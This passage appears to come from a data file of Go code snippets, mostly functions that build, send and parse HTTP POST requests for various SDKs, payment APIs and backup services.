{\n\t\treturn localVarReturnValue, nil, reportError(\"body is required and must be specified\")\n\t}\n\n\tif r.silent != nil {\n\t\tlocalVarQueryParams.Add(\"silent\", parameterToString(*r.silent, \"\"))\n\t}\n\t// to determine the Content-Type header\n\tlocalVarHTTPContentTypes := []string{\"application/json\"}\n\n\t// set Content-Type header\n\tlocalVarHTTPContentType := selectHeaderContentType(localVarHTTPContentTypes)\n\tif localVarHTTPContentType != \"\" {\n\t\tlocalVarHeaderParams[\"Content-Type\"] = localVarHTTPContentType\n\t}\n\n\t// to determine the Accept header\n\tlocalVarHTTPHeaderAccepts := []string{\"application/json\"}\n\n\t// set Accept header\n\tlocalVarHTTPHeaderAccept := selectHeaderAccept(localVarHTTPHeaderAccepts)\n\tif localVarHTTPHeaderAccept != \"\" {\n\t\tlocalVarHeaderParams[\"Accept\"] = localVarHTTPHeaderAccept\n\t}\n\t// body params\n\tlocalVarPostBody = r.body\n\tif r.ctx != nil {\n\t\t// API Key Authentication\n\t\tif auth, ok := r.ctx.Value(ContextAPIKeys).(map[string]APIKey); ok {\n\t\t\tif auth, ok := auth[\"Authorization\"]; ok {\n\t\t\t\tvar key string\n\t\t\t\tif auth.Prefix != \"\" {\n\t\t\t\t\tkey = auth.Prefix + \" \" + auth.Key\n\t\t\t\t} else {\n\t\t\t\t\tkey = auth.Key\n\t\t\t\t}\n\t\t\t\tlocalVarHeaderParams[\"Authorization\"] = key\n\t\t\t}\n\t\t}\n\t}\n\treq, err := r.apiService.client.prepareRequest(r.ctx, localVarPath, localVarHTTPMethod, localVarPostBody, localVarHeaderParams, localVarQueryParams, localVarFormParams, localVarFormFileName, localVarFileName, localVarFileBytes)\n\tif err != nil {\n\t\treturn localVarReturnValue, nil, err\n\t}\n\n\tlocalVarHTTPResponse, err := r.apiService.client.callAPI(req)\n\tif err != nil || localVarHTTPResponse == nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tlocalVarBody, err := _ioutil.ReadAll(localVarHTTPResponse.Body)\n\tlocalVarHTTPResponse.Body.Close()\n\tif err != nil {\n\t\treturn localVarReturnValue, localVarHTTPResponse, err\n\t}\n\n\tif localVarHTTPResponse.StatusCode >= 300 {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: localVarHTTPResponse.Status,\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 200 {\n\t\t\tvar v MultipleCustomerProfileIntegrationResponseV2\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 400 {\n\t\t\tvar v ErrorResponseWithStatus\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t}\n\t\tif localVarHTTPResponse.StatusCode == 401 {\n\t\t\tvar v ErrorResponseWithStatus\n\t\t\terr = r.apiService.client.decode(&v, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\t\t\tif err != nil {\n\t\t\t\tnewErr.error = err.Error()\n\t\t\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t\t\t}\n\t\t\tnewErr.model = v\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\terr = r.apiService.client.decode(&localVarReturnValue, localVarBody, localVarHTTPResponse.Header.Get(\"Content-Type\"))\n\tif err != nil {\n\t\tnewErr := GenericOpenAPIError{\n\t\t\tbody: localVarBody,\n\t\t\terror: err.Error(),\n\t\t}\n\t\treturn localVarReturnValue, localVarHTTPResponse, newErr\n\t}\n\n\treturn localVarReturnValue, localVarHTTPResponse, nil\n}", "func (c *Controller) createInAPI(uri string, data io.Reader) error {\n\tresp, err := http.Post(uri, \"application/json; charset=utf-8\", data)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tif resp.StatusCode != http.StatusCreated {\n\t\tlog.Printf(\"status code received back was not expected during creation\")\n\t}\n\n\treturn nil\n}", "func PerformPublishV2RequestWithHeaders(t *testing.T, publishURL string, payload string, headers map[string]string) ([]byte, int) {\n\treq, _ := http.NewRequest(\"POST\", publishURL+\"/v2/events\", strings.NewReader(payload))\n\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\tfor header, value := range headers {\n\t\treq.Header.Set(header, value)\n\t}\n\n\tres, err := http.DefaultClient.Do(req)\n\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tdefer func() { _ = res.Body.Close() }()\n\tbody, err := ioutil.ReadAll(res.Body)\n\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\n\treturn body, res.StatusCode\n}", "func (me *CHARGES_IMPL) UpdateChargeCard (\r\n chargeId string,\r\n body *models_pkg.ChargesCardRequest,\r\n idempotencyKey *string) (*models_pkg.ChargesCardResponse, error) {\r\n //the endpoint path uri\r\n _pathUrl := \"/charges/{charge_id}/card\"\r\n\r\n //variable to hold errors\r\n var err error = nil\r\n //process optional template parameters\r\n _pathUrl, err = apihelper_pkg.AppendUrlWithTemplateParameters(_pathUrl, map[string]interface{} {\r\n \"charge_id\" : chargeId,\r\n })\r\n if err != nil {\r\n //error in template param handling\r\n return nil, err\r\n }\r\n\r\n //the base uri for api requests\r\n _queryBuilder := configuration_pkg.BASEURI;\r\n\r\n //prepare query string for API call\r\n _queryBuilder = _queryBuilder + _pathUrl\r\n\r\n //validate and preprocess url\r\n _queryBuilder, err = apihelper_pkg.CleanUrl(_queryBuilder)\r\n if err != nil {\r\n //error in url validation or cleaning\r\n return nil, err\r\n }\r\n //prepare headers for the outgoing request\r\n headers := map[string]interface{} {\r\n \"user-agent\" : \"MundiSDK - Go 2.4.5\",\r\n \"accept\" : \"application/json\",\r\n \"content-type\" : \"application/json; charset=utf-8\",\r\n \"Content-Type\" : \"application/json\",\r\n \"idempotency-key\" : apihelper_pkg.ToString(idempotencyKey, \"\"),\r\n }\r\n\r\n //prepare API request\r\n _request := unirest.PatchWithAuth(_queryBuilder, headers, body, me.config.BasicAuthUserName(), me.config.BasicAuthPassword())\r\n //and invoke the API call request to fetch the response\r\n _response, err := unirest.AsString(_request,false);\r\n if err != nil {\r\n //error in API invocation\r\n return nil, err\r\n }\r\n\r\n //error handling using HTTP status codes\r\n if (_response.Code == 400) {\r\n err = apihelper_pkg.NewAPIError(\"Invalid request\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 401) {\r\n err = apihelper_pkg.NewAPIError(\"Invalid API key\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 404) {\r\n err = apihelper_pkg.NewAPIError(\"An informed resource was not found\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 412) {\r\n err = apihelper_pkg.NewAPIError(\"Business validation error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 422) {\r\n err = apihelper_pkg.NewAPIError(\"Contract validation error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code == 500) {\r\n err = apihelper_pkg.NewAPIError(\"Internal server error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code < 200) || (_response.Code > 206) { //[200,206] = HTTP OK\r\n err = apihelper_pkg.NewAPIError(\"HTTP Response Not OK\", _response.Code, _response.RawBody)\r\n }\r\n if(err != nil) {\r\n //error detected in status code validation\r\n return nil, err\r\n }\r\n\r\n //returning the response\r\n var retVal *models_pkg.ChargesCardResponse = &models_pkg.ChargesCardResponse{}\r\n err = json.Unmarshal(_response.RawBody, &retVal)\r\n\r\n if err != nil {\r\n //error in parsing\r\n return nil, err\r\n }\r\n return retVal, nil\r\n\r\n}", "func (mc *Controller) validatePostResponse(apiResponse *http.Response) driver.PostResponseType {\n\tlog.Debug().Msgf(\"Executing validatePostResponse.\")\n\tvar body driver.PostResponseType\n\terr := json.NewDecoder(apiResponse.Body).Decode(&body)\n\tif apiResponse.StatusCode != http.StatusOK {\n\t\tlog.Debug().Msgf(\"Status from Server: %d\", apiResponse.StatusCode)\n\t\tlog.Fatal().Err(err).Msgf(\"Stack Analyses Post Request Failed. Please retry after sometime. If issue persists, Please raise at https://github.com/fabric8-analytics/cli-tools/issues.\")\n\t}\n\tlog.Debug().Msgf(\"Success validatePostResponse.\")\n\treturn body\n}", "func ParseReplacechangeaspecificCustomerResponse(rsp *http.Response) (*ReplacechangeaspecificCustomerResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &ReplacechangeaspecificCustomerResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest Customers\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func (api *api) call(ctx context.Context, httpMethod string, path string, additionalHeader map[string]string, bodyReqPayload []byte, dtoResp interface{}) (err error) {\n\t// urlQuery := url.Values{\"access_token\": []string{api.accessToken}}\n\turlQuery := url.Values{}\n\turlTarget, err := buildURL(api.config.URL, path, urlQuery)\n\tif err != nil {\n\t\treturn errors.Trace(err)\n\t}\n\n\treq, err := http.NewRequest(httpMethod, urlTarget, bytes.NewBuffer(bodyReqPayload))\n\tif err != nil {\n\t\treturn errors.Trace(err)\n\t}\n\treq = req.WithContext(ctx)\n\n\treq.Header.Set(\"content-type\", \"application/json\")\n\n\treq.Header.Set(\"Authorization\", \"Bearer \"+api.accessToken)\n\treq.Header.Set(\"Origin\", api.config.OriginHost)\n\treq.Header.Set(\"X-BCA-Key\", api.config.APIKey)\n\n\ttimestamp := time.Now().Format(\"2006-01-02T15:04:05.999Z07:00\")\n\treq.Header.Set(\"X-BCA-Timestamp\", timestamp)\n\n\tsignature, _, err := GenerateSignature(api.config.APISecret, httpMethod, path, api.accessToken, string(bodyReqPayload), timestamp)\n\tif err != nil {\n\t\treturn errors.Trace(err)\n\t}\n\treq.Header.Set(\"X-BCA-Signature\", signature)\n\n\tapi.log(ctx).Info(httpMethod + \" \" + urlTarget + \" \" + timestamp)\n\t// api.log(ctx).Info(\"StrToSIGN: \" + strToSign)\n\t// api.log(ctx).Info(\"SIGN: \" + signature)\n\n\tfor key, val := range additionalHeader {\n\t\treq.Header.Set(key, val)\n\t}\n\n\tresp, err := api.httpClient.Do(req)\n\tif err != nil {\n\t\treturn errors.Trace(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tbodyRespBytes, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn errors.Trace(err)\n\t}\n\n\tapi.log(ctx).Info(resp.StatusCode)\n\tapi.log(ctx).Info(string(bodyRespBytes))\n\n\tresp.Body = ioutil.NopCloser(bytes.NewBuffer(bodyRespBytes))\n\n\terr = json.NewDecoder(resp.Body).Decode(&dtoResp)\n\n\tif err != nil {\n\t\treturn errors.Trace(err)\n\t}\n\n\treturn nil\n}", "func ParseRoutingAppCoveragesUpdateInstanceResponse(rsp *http.Response) (*RoutingAppCoveragesUpdateInstanceResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer func() { _ = rsp.Body.Close() }()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &RoutingAppCoveragesUpdateInstanceResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 200:\n\t\tvar dest RoutingAppCoverageResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON200 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 400:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON400 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 403:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON403 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 404:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON404 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 409:\n\t\tvar dest ErrorResponse\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON409 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func (api Tumblr) post(url string, params string) Response {\n\trequest, err := http.NewRequest(\"POST\", url, strings.NewReader(params))\n\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\trequest.Header.Set(\"Content-Type\", \"application/x-www-form-urlencoded\")\n\n\tapi.oauthService.Sign(request, &api.config)\n\tclient := new(http.Client)\n\tclientResponse, err := client.Do(request)\n\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\tdefer clientResponse.Body.Close()\n\n\tbody, err := ioutil.ReadAll(clientResponse.Body)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\n\tvar response Response\n\terr = json.Unmarshal(body, &response)\n\tif err != nil {\n\t\tlog.Println(err)\n\t}\n\treturn response\n}", "func (api *APIServer) integrationPost(w http.ResponseWriter, r *http.Request) {\n\tbody, err := ioutil.ReadAll(r.Body)\n\tif err != nil {\n\t\thttp.Error(w, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tlines := strings.Split(string(body), \"\\n\")\n\tif len(lines) < 2 {\n\t\thttp.Error(w, \"use TSVWithNames format\", http.StatusBadRequest)\n\t\treturn\n\t}\n\tcolumns := strings.Split(lines[1], \"\\t\")\n\tcommands := strings.Split(columns[0], \" \")\n\tlog.Println(commands)\n\n\tswitch commands[0] {\n\tcase \"create\", \"upload\", \"download\":\n\t\tif locked := api.lock.TryAcquire(1); !locked {\n\t\t\tlog.Println(ErrAPILocked)\n\t\t\thttp.Error(w, ErrAPILocked.Error(), http.StatusLocked)\n\t\t\treturn\n\t\t}\n\t\tdefer api.lock.Release(1)\n\t\tstart := time.Now()\n\t\tapi.metrics.LastBackupStart.Set(float64(start.Unix()))\n\t\tdefer api.metrics.LastBackupDuration.Set(float64(time.Since(start).Nanoseconds()))\n\t\tdefer api.metrics.LastBackupEnd.Set(float64(time.Now().Unix()))\n\n\t\tgo func() {\n\t\t\tapi.status.start(columns[0])\n\t\t\terr := api.c.Run(append([]string{\"clickhouse-backup\"}, commands...))\n\t\t\tdefer api.status.stop(err)\n\t\t\tif err != nil {\n\t\t\t\tapi.metrics.FailedBackups.Inc()\n\t\t\t\tapi.metrics.LastBackupSuccess.Set(0)\n\t\t\t\tlog.Println(err)\n\t\t\t\treturn\n\t\t\t}\n\t\t}()\n\t\tapi.metrics.SuccessfulBackups.Inc()\n\t\tapi.metrics.LastBackupSuccess.Set(1)\n\t\tfmt.Fprintln(w, \"acknowledged\")\n\t\treturn\n\tcase \"delete\", \"freeze\", \"clean\":\n\t\tif locked := api.lock.TryAcquire(1); !locked {\n\t\t\tlog.Println(ErrAPILocked)\n\t\t\thttp.Error(w, ErrAPILocked.Error(), http.StatusLocked)\n\t\t\treturn\n\t\t}\n\t\tdefer api.lock.Release(1)\n\t\tstart := time.Now()\n\t\tapi.metrics.LastBackupStart.Set(float64(start.Unix()))\n\t\tdefer api.metrics.LastBackupDuration.Set(float64(time.Since(start).Nanoseconds()))\n\t\tdefer api.metrics.LastBackupEnd.Set(float64(time.Now().Unix()))\n\n\t\tapi.status.start(columns[0])\n\t\terr := api.c.Run(append([]string{\"clickhouse-backup\"}, commands...))\n\t\tdefer api.status.stop(err)\n\t\tif err != nil {\n\t\t\tapi.metrics.FailedBackups.Inc()\n\t\t\tapi.metrics.LastBackupSuccess.Set(0)\n\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t\tlog.Println(err)\n\t\t\treturn\n\t\t}\n\t\tapi.metrics.SuccessfulBackups.Inc()\n\t\tapi.metrics.LastBackupSuccess.Set(1)\n\t\tfmt.Fprintln(w, \"OK\")\n\t\tlog.Println(\"OK\")\n\t\treturn\n\tdefault:\n\t\thttp.Error(w, fmt.Sprintf(\"bad operation '%s'\", columns[0]), http.StatusBadRequest)\n\t}\n}", "func (client HTTPSuccessClient) Post200(booleanValue *bool) (result autorest.Response, err error) {\n req, err := client.Post200Preparer(booleanValue)\n if err != nil {\n return result, autorest.NewErrorWithError(err, \"httpinfrastructuregroup.HTTPSuccessClient\", \"Post200\", nil , \"Failure preparing request\")\n }\n\n resp, err := client.Post200Sender(req)\n if err != nil {\n result.Response = resp\n return result, autorest.NewErrorWithError(err, \"httpinfrastructuregroup.HTTPSuccessClient\", \"Post200\", resp, \"Failure sending request\")\n }\n\n result, err = client.Post200Responder(resp)\n if err != nil {\n err = autorest.NewErrorWithError(err, \"httpinfrastructuregroup.HTTPSuccessClient\", \"Post200\", resp, \"Failure responding to request\")\n }\n\n return\n}", "func ReturnIspwResponse(res http.ResponseWriter, req *http.Request) {\n\tres.Header().Set(\"Content-Type\", \"application/json\")\n\tc := IspwResponse{\"ISPW2345\", \"This worked\", \"http://foobarsoft.com/ispw/w3t/sets/s0123456\"}\n\toutgoingJSON, err := json.Marshal(c)\n\tif err != nil {\n\t\tlog.Println(err.Error())\n\t\thttp.Error(res, err.Error(), http.StatusInternalServerError)\n\t\treturn\n\t}\n\tres.WriteHeader(http.StatusCreated)\n\tfmt.Fprint(res, string(outgoingJSON))\n\n}", "func (h *Handler) Post(w http.ResponseWriter, r *http.Request) {\n\n\trequest, err := decodeSCEPRequest(r)\n\tif err != nil {\n\t\twriteError(w, errors.Wrap(err, \"invalid scep post request\"))\n\t\treturn\n\t}\n\n\tctx := r.Context()\n\tvar response SCEPResponse\n\n\tswitch request.Operation {\n\tcase opnPKIOperation:\n\t\tresponse, err = h.PKIOperation(ctx, request)\n\tdefault:\n\t\terr = errors.Errorf(\"unknown operation: %s\", request.Operation)\n\t}\n\n\tif err != nil {\n\t\twriteError(w, errors.Wrap(err, \"scep post request failed\"))\n\t\treturn\n\t}\n\n\twriteSCEPResponse(w, response)\n}", "func (api *API) postToAPI(ctx context.Context, path string, bodyReqPayload []byte) (dtoResp dto.ApiResponse, err error) {\n\turlQuery := url.Values{\"access_token\": []string{api.accessToken}}\n\turlTarget, err := buildURL(api.config.BNIServer, path, urlQuery)\n\tif err != nil {\n\t\treturn dtoResp, errors.Trace(err)\n\t}\n\n\treq, err := http.NewRequest(http.MethodPost, urlTarget, bytes.NewBuffer(bodyReqPayload))\n\tif err != nil {\n\t\treturn dtoResp, errors.Trace(err)\n\t}\n\treq = req.WithContext(ctx)\n\n\treq.Header.Set(\"content-type\", \"application/json\")\n\n\tresp, err := api.httpClient.Do(req)\n\tif err != nil {\n\t\treturn dtoResp, errors.Trace(err)\n\t}\n\tdefer resp.Body.Close()\n\n\tdtoResp.StatusCode = resp.StatusCode\n\n\tbodyRespBytes, err := ioutil.ReadAll(resp.Body)\n\tif err != nil {\n\t\treturn dtoResp, errors.Trace(err)\n\t}\n\n\tapi.log(ctx).Info(resp.StatusCode)\n\tapi.log(ctx).Info(string(bodyRespBytes))\n\n\tresp.Body = ioutil.NopCloser(bytes.NewBuffer(bodyRespBytes))\n\n\terr = json.NewDecoder(resp.Body).Decode(&dtoResp)\n\n\tif err != nil {\n\t\treturn dtoResp, errors.Trace(err)\n\t}\n\n\treturn dtoResp, nil\n}", "func generateCaptchaHandler2(w http.ResponseWriter, r *http.Request) {\n\t//parse request parameters\n\tdecoder := json.NewDecoder(r.Body)\n\tvar postParameters ConfigJsonBody\n\terr := decoder.Decode(&postParameters)\n\tif err != nil {\n\t\tglog.Infoln(err)\n\t}\n\tfmt.Println(postParameters)\n\tdefer r.Body.Close()\n\n\t//create base64 encoding captcha\n\tvar config interface{}\n\tswitch postParameters.CaptchaType {\n\tcase \"audio\":\n\t\tconfig = postParameters.ConfigAudio\n\tcase \"character\":\n\t\tconfig = postParameters.ConfigCharacter\n\tdefault:\n\t\tconfig = postParameters.ConfigDigit\n\t}\n\tcaptchaId, captcaInterfaceInstance := base64Captcha.GenerateCaptcha(postParameters.Id, config)\n\tbase64blob := base64Captcha.CaptchaWriteToBase64Encoding(captcaInterfaceInstance)\n\n\t//or you can just write the captcha content to the httpResponseWriter.\n\t//before you put the captchaId into the response COOKIE.\n\t//captcaInterfaceInstance.WriteTo(w)\n\n\t//set json response\n\t//设置json响应\n\tw.Header().Set(\"Content-Type\", \"application/json; charset=utf-8\")\n\tbody := map[string]interface{}{\"code\": 1, \"data\": base64blob, \"captchaId\": captchaId, \"msg\": \"success\"}\n\tjson.NewEncoder(w).Encode(body)\n}", "func (c *InfoController) Post() {\n\tvar input map[string]interface{}\n\tvar resp utils.SimpleResponse\n\tif err := json.Unmarshal(c.Ctx.Input.RequestBody, &input); err == nil {\n\t\tif input[\"token\"] == nil || input[\"appname\"] == nil {\n\t\t\tresp.Success = false\n\t\t\tresp.Message = utils.Msg.ParamErr + \"(token & appname required)\"\n\t\t\tc.Data[\"json\"] = resp\n\t\t\tc.ServeJSON()\n\t\t\treturn\n\t\t}\n\t\ttoken := input[\"token\"].(string)\n\t\tappname := input[\"appname\"].(string)\n\t\tresp.Success, resp.Message = services.CheckToken(token)\n\t\t// pass CheckToken\n\t\tif resp.Success == true {\n\t\t\tidentity := services.QueryIdentity(resp.Message.(string), false)\n\t\t\tcallback := services.QueryCode(identity.Id, appname)\n\t\t\tif callback == nil {\n\t\t\t\tresp.Success = false\n\t\t\t\tcallback = &services.Callback{Token: resp.Message.(string)}\n\t\t\t} else {\n\t\t\t\tresp.Success = true\n\t\t\t\tcallback.Token = resp.Message.(string)\n\t\t\t}\n\t\t\tresp.Message = callback\n\t\t}\n\t\tc.Data[\"json\"] = resp\n\t} else {\n\t\tc.Data[\"json\"] = err.Error()\n\t}\n\tc.ServeJSON()\n}", "func (c *Campaigner) post(url string, i interface{}) (r gorequest.Response, b []byte, err error) {\n\t// Check API config.\n\tif err := c.CheckConfig(); err != nil {\n\t\treturn r, b, err\n\t}\n\n\t// Generate URL and JSON.\n\turl = c.GenerateURL(url)\n\tj, err := json.Marshal(i)\n\tif err != nil {\n\t\treturn r, b, fmt.Errorf(\"Could not marshall json for interface: %s\\n\", err)\n\t}\n\n\t// Send POST request.\n\tr, b, errs := gorequest.New().\n\t\tPost(url).\n\t\tSend(string(j)).\n\t\tSet(\"Api-Token\", c.APIToken).\n\t\tEndBytes()\n\n\t// Error check.\n\tif errs != nil {\n\t\treturn r, b, CustomError{Message: \"could not perform HTTP POST request\", HTTPErrors: errs}\n\t}\n\n\treturn r, b, nil\n}", "func ParseCreateanewTopupCashResponse(rsp *http.Response) (*CreateanewTopupCashResponse, error) {\n\tbodyBytes, err := ioutil.ReadAll(rsp.Body)\n\tdefer rsp.Body.Close()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tresponse := &CreateanewTopupCashResponse{\n\t\tBody: bodyBytes,\n\t\tHTTPResponse: rsp,\n\t}\n\n\tswitch {\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 201:\n\t\tvar dest []Thenewlycreateditemorempty51\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON201 = &dest\n\n\tcase strings.Contains(rsp.Header.Get(\"Content-Type\"), \"json\") && rsp.StatusCode == 422:\n\t\tvar dest Anerror\n\t\tif err := json.Unmarshal(bodyBytes, &dest); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresponse.JSON422 = &dest\n\n\t}\n\n\treturn response, nil\n}", "func PostJSON(\n\tctx context.Context, span opentracing.Span, httpClient *http.Client,\n\tapiURL string, request, response interface{},\n) error {\n\tjsonBytes, err := json.Marshal(request)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tparsedAPIURL, err := url.Parse(apiURL)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tparsedAPIURL.Path = InternalPathPrefix + strings.TrimLeft(parsedAPIURL.Path, \"/\")\n\tapiURL = parsedAPIURL.String()\n\n\treq, err := http.NewRequest(http.MethodPost, apiURL, bytes.NewReader(jsonBytes))\n\tif err != nil {\n\t\treturn err\n\t}\n\n\t// Mark the span as being an RPC client.\n\text.SpanKindRPCClient.Set(span)\n\tcarrier := opentracing.HTTPHeadersCarrier(req.Header)\n\ttracer := opentracing.GlobalTracer()\n\n\tif err = tracer.Inject(span.Context(), opentracing.HTTPHeaders, carrier); err != nil {\n\t\treturn err\n\t}\n\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\n\tres, err := httpClient.Do(req.WithContext(ctx))\n\tif res != nil {\n\t\tdefer (func() { err = res.Body.Close() })()\n\t}\n\tif err != nil {\n\t\treturn err\n\t}\n\tif res.StatusCode != http.StatusOK {\n\t\tvar errorBody struct {\n\t\t\tMessage string `json:\"message\"`\n\t\t}\n\t\tif _, ok := response.(*api.PerformKeyBackupResponse); ok { // TODO: remove this, once cross-boundary errors are a thing\n\t\t\treturn nil\n\t\t}\n\t\tif msgerr := json.NewDecoder(res.Body).Decode(&errorBody); msgerr == nil {\n\t\t\treturn fmt.Errorf(\"internal API: %d from %s: %s\", res.StatusCode, apiURL, errorBody.Message)\n\t\t}\n\t\treturn fmt.Errorf(\"internal API: %d from %s\", res.StatusCode, apiURL)\n\t}\n\treturn json.NewDecoder(res.Body).Decode(response)\n}", "func (me *PROTECTIONJOBS_IMPL) CreateProtectionJob (\r\n body *models.ProtectionJobRequest) (*models.ProtectionJob, error) {\r\n//validating required parameters\r\n if (body == nil){\r\n return nil,errors.New(\"The parameter 'body' is a required parameter and cannot be nil.\")\r\n} //the endpoint path uri\r\n _pathUrl := \"/public/protectionJobs\"\r\n\r\n //variable to hold errors\r\n var err error = nil\r\n //the base uri for api requests\r\n _queryBuilder := configuration.GetBaseURI(configuration.DEFAULT_HOST,me.config);\r\n\r\n //prepare query string for API call\r\n _queryBuilder = _queryBuilder + _pathUrl\r\n\r\n //validate and preprocess url\r\n _queryBuilder, err = apihelper.CleanUrl(_queryBuilder)\r\n if err != nil {\r\n //error in url validation or cleaning\r\n return nil, err\r\n }\r\n if me.config.AccessToken() == nil {\r\n return nil, errors.New(\"Access Token not set. Please authorize the client using client.Authorize()\");\r\n }\r\n //prepare headers for the outgoing request\r\n headers := map[string]interface{} {\r\n \"user-agent\" : \"cohesity-Go-sdk-6.2.0\",\r\n \"accept\" : \"application/json\",\r\n \"content-type\" : \"application/json; charset=utf-8\",\r\n \"Authorization\" : fmt.Sprintf(\"%s %s\",*me.config.AccessToken().TokenType, *me.config.AccessToken().AccessToken),\r\n }\r\n\r\n //prepare API request\r\n _request := unirest.Post(_queryBuilder, headers, body)\r\n //and invoke the API call request to fetch the response\r\n _response, err := unirest.AsString(_request,me.config.SkipSSL());\r\n if err != nil {\r\n //error in API invocation\r\n return nil, err\r\n }\r\n\r\n //error handling using HTTP status codes\r\n if (_response.Code == 0) {\r\n err = apihelper.NewAPIError(\"Error\", _response.Code, _response.RawBody)\r\n } else if (_response.Code < 200) || (_response.Code > 206) { //[200,206] = HTTP OK\r\n err = apihelper.NewAPIError(\"HTTP Response Not OK\", _response.Code, _response.RawBody)\r\n }\r\n if(err != nil) {\r\n //error detected in status code validation\r\n return nil, err\r\n }\r\n\r\n //returning the response\r\n var retVal *models.ProtectionJob = &models.ProtectionJob{}\r\n err = json.Unmarshal(_response.RawBody, &retVal)\r\n\r\n if err != nil {\r\n //error in parsing\r\n return nil, err\r\n }\r\n return retVal, nil\r\n\r\n}", "func TestPagarmeSubscriptionUpdate(t *testing.T) {\n \n Pagarme := pagarme.NewPagarme(\"pt-BR\", ApiKey, CryptoKey)\n Pagarme.SetDebug()\n\n planId, _ := client.Get(\"PlanoId\").Int64()\n cardId, _ := client.Get(\"CardId\").Result()\n subscriptionId, _ := client.Get(\"SubscriptionId\").Int64()\n subscription := pagarme.NewSubscriptionWithCard(planId)\n subscription.CardId = cardId\n subscription.Id = subscriptionId\n subscription.PostbackUrl = \"https://mobilemind.free.beeceptor.com/webhook/pagarme\"\n\n\n pagarmefillCustomer(subscription.Customer)\n\n result, err := Pagarme.SubscriptionUpdate(subscription)\n\n if err != nil {\n t.Errorf(\"Erro ao create subscription: %v\", err)\n }else{\n //t.Log(fmt.Sprintf(\"result = %v\", customer.Id)) \n\n if result.Id == 0 {\n t.Errorf(\"Subscription id is expected\")\n return\n }\n\n\n }\n\n}", "func (client HTTPSuccessClient) Post202(booleanValue *bool) (result autorest.Response, err error) {\n req, err := client.Post202Preparer(booleanValue)\n if err != 